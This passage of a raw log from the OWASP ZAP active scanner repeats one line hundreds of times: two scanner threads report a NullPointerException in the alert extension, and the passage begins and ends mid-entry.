java.lang.NullPointerException 13308521 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13308521 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13308721 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13308722 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13308921 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13308921 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13309123 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13309125 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13309325 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13309325 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13309525 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13309526 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13309727 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13309728 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13309938 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13309938 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13310139 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13310139 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13310338 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13310339 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13311152 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13311152 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13311343 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13311343 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13311544 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13311544 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13311746 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13311746 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13311947 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13311947 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13312147 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13312147 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13312352 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13312551 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13312551 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13312749 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13312752 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13312948 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13312953 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13313155 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13313155 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13313353 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13313356 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13313553 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13313554 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13313754 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13313757 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13313955 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13313956 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13314672 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13314672 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13314757 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13314758 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13314957 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13314961 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13315162 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13315163 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13315362 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13315362 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13315561 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13315565 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13315766 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13315766 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13315969 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13315970 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13316168 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13316168 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13316367 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13316368 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13317155 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13317157 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13317171 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13317172 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13317374 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13317374 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13317574 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13317575 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13317775 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13317775 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13317976 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13317976 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13318176 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13318176 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13318376 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13318378 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13318578 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13318578 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13318779 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13318779 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13318986 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13318987 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13319188 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13319188 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13319389 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13319389 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13319588 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13319589 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13320216 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13320224 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13320863 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13320863 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13321022 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13321023 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13321224 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13321224 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13321424 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13321425 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13321625 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13321626 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13321825 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13321826 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13322027 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13322029 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13322229 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13322229 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13322427 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13322430 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13322629 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13322629 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13322832 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13322832 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13323031 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13323034 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13323233 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13323233 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13323433 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13323433 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13323634 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13323636 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13323836 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13323836 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13324036 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13324037 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13324239 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13324239 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13324439 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13324439 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13324639 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13324666 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13324839 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13324842 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13325042 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13325042 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13325242 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13325243 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13325444 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13325444 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13325643 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13325643 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13325845 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13325845 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13326047 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13326047 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13326247 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13326248 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13326448 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13326448 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13326648 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13326650 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13327803 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13327808 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13327848 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13327850 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13328052 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13328063 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13328253 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13328456 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13328459 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13328654 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13328654 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13328855 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13328855 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13329055 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13329056 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13329269 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13329271 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13329458 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13329461 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13329658 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13329660 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13329859 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13329859 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13330061 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13330065 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13330264 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13330264 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13330464 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13330465 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13330669 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13330670 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13330877 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13330878 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13331068 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13331069 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13331268 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13331270 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13331471 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13331982 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13331983 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13332189 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13332189 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13332390 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13332391 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13332592 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13332592 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13332794 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13332794 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13332994 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13332994 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13333193 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13333193 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13333395 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13333395 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13333595 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13333596 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13333795 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13333797 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13334000 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13334000 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13334200 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13334200 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13334399 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13334400 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13335428 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13335431 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13335631 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13335633 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13335833 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13335833 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13336035 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13336036 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13336234 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13336235 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13336437 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13336437 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13336637 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13336638 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13337081 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13337081 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13337240 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13337240 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13337441 [ZAP-ActiveScanner-0] ERROR 